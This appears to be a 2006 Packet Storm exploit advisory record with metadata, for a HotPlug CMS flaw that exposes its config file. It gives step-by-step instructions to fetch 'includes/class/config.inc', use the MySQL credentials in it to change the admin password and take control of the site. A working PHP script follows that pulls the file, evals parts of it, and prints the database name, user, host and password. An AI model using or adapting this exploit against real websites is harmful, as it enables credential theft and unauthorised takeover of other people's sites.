ID PACKETSTORM:49953 Type packetstorm Reporter HACKERS PAL Modified 2006-09-13T00:00:00
Description
`Hello
HotPlug CMS Config File Include Vulnerability
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : security@soqor.net
After Script Url Add
includes/class/config.inc
And you will download the config file ,, so that you will be able to connect by remote connect program to the mysql server and change admin password and be able to control the website..
And This is the exploit if you want :-
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* HotPlug CMS Config File Include Vulnerability exploit
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
print_r('
/**********************************************/
/* HotPlug CMS Config File Include Vul */
/* by HACKERS PAL <security@soqor.net> */
/* site: http://www.soqor.net */');
if ($argc<2) {
print_r('
/* -- */
/* Usage: php '.$argv[0].' host */
/* Example: */
/* php '.$argv[0].' http://localhost/hot */
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$url=$argv[1];
$exploit="/includes/class/config.inc";
$page=$url.$exploit;
Function get_page($url)
{
if(function_exists("file_get_contents"))
{
$contents = file_get_contents($url);
}
else
{
$fp=fopen("$url","r");
while($line=fread($fp,1024))
{
$contents=$contents.$line;
}
}
return $contents;
}
$page = get_page($page);
if(eregi("<?php",$page))
{
$lines = explode("\n",$page);
$evaled = $lines[50].$lines[51].$lines[52].$lines[53].$lines[54].$lines[55].$lines[56].$lines[58].$lines[58].$lines[59];
$evaled=str_replace("include","#include",$evaled);
eval($evaled);
Echo "\n[+] Database Name : $db_name";
Echo "\n[+] Database User : $db_user";
Echo "\n[+] Database Host : $db_host";
Echo "\n[+] Database Pass : $db_password";
Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
}
else
{
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
}
?>
WwW.SoQoR.NeT
`
{"sourceHref": "https://packetstormsecurity.com/files/download/49953/hotplugCMSconfig.txt", "sourceData": "`Hello \n \nHotPlug CMS Config File Include Vulnerability \n \nDiscovered by : HACKERS PAL \nCopyrights : HACKERS PAL \nWebsite : WwW.SoQoR.NeT \nEmail : security@soqor.net \n \nAfter Script Url Add \nincludes/class/config.inc \n \nAnd you will download the config file ,, so that you will be able to connect by remote connect program to the mysql server and change admin password and be able to control the website.. \n \nAnd This is the exploit if you want :- \n \n#!/usr/bin/php -q -d short_open_tag=on \n<? \n/* \n/* HotPlug CMS Config File Include Vulnerability exploit \n/* By : HACKERS PAL \n/* WwW.SoQoR.NeT \n*/ \nprint_r(' \n/**********************************************/ \n/* HotPlug CMS Config File Include Vul */ \n/* by HACKERS PAL <security@soqor.net> */ \n/* site: http://www.soqor.net */'); \nif ($argc<2) { \nprint_r(' \n/* -- */ \n/* Usage: php '.$argv[0].' host */ \n/* Example: */ \n/* php '.$argv[0].' http://localhost/hot */ \n/**********************************************/ \n'); \ndie; \n} \nerror_reporting(0); \nini_set(\"max_execution_time\",0); \nini_set(\"default_socket_timeout\",5); \n \n$url=$argv[1]; \n$exploit=\"/includes/class/config.inc\"; \n$page=$url.$exploit; \nFunction get_page($url) \n{ \n \nif(function_exists(\"file_get_contents\")) \n{ \n \n$contents = file_get_contents($url); \n \n} \nelse \n{ \n$fp=fopen(\"$url\",\"r\"); \nwhile($line=fread($fp,1024)) \n{ \n$contents=$contents.$line; \n} \n \n \n} \nreturn $contents; \n} \n \n$page = get_page($page); \n \nif(eregi(\"<?php\",$page)) \n{ \n$lines = explode(\"\\n\",$page); \n \n$evaled = $lines[50].$lines[51].$lines[52].$lines[53].$lines[54].$lines[55].$lines[56].$lines[58].$lines[58].$lines[59]; \n$evaled=str_replace(\"include\",\"#include\",$evaled); \neval($evaled); \n \n \nEcho \"\\n[+] Database Name : $db_name\"; \nEcho \"\\n[+] Database User : $db_user\"; \nEcho \"\\n[+] Database Host : $db_host\"; \nEcho \"\\n[+] Database Pass : $db_password\"; \nDie(\"\\n/* Visit us : WwW.SoQoR.NeT */\\n/**********************************************/\"); \n} \nelse \n{ \nDie(\"\\n[-] Exploit Failed\\n/* Visit us : WwW.SoQoR.NeT */\\n/**********************************************/\"); \n \n} \n?> \n \nWwW.SoQoR.NeT \n`\n", "edition": 1, "references": [], "modified": "2006-09-13T00:00:00", "hash": "833a818221e7a8d23cd75a844ebaada4e343ee46d7b14ad9ca54d268ce4a3298", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/49953/hotplugCMSconfig.txt.html", "description": "", "id": "PACKETSTORM:49953", "reporter": "HACKERS PAL", "lastseen": "2016-11-03T10:23:24", "published": "2006-09-13T00:00:00", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:23:24", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:23:24", "rev": 2}, "vulnersScore": -0.3}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "hotplugCMSconfig.txt", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "ed953cdc9fa6e7dd89606b2589225963", "key": "href"}, {"hash": "2066bb60cc324fa1260a24f414dd4b06", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "2066bb60cc324fa1260a24f414dd4b06", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "2092f83e0348971fdb13bc6926b3caf7", "key": "reporter"}, {"hash": "7d7212886a4807ed6b86a40be7efc9fd", "key": "sourceData"}, {"hash": "7641f4039b57e76edc989a7038660891", "key": "sourceHref"}, {"hash": "e78f72148eb69fc96290185712edf85f", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
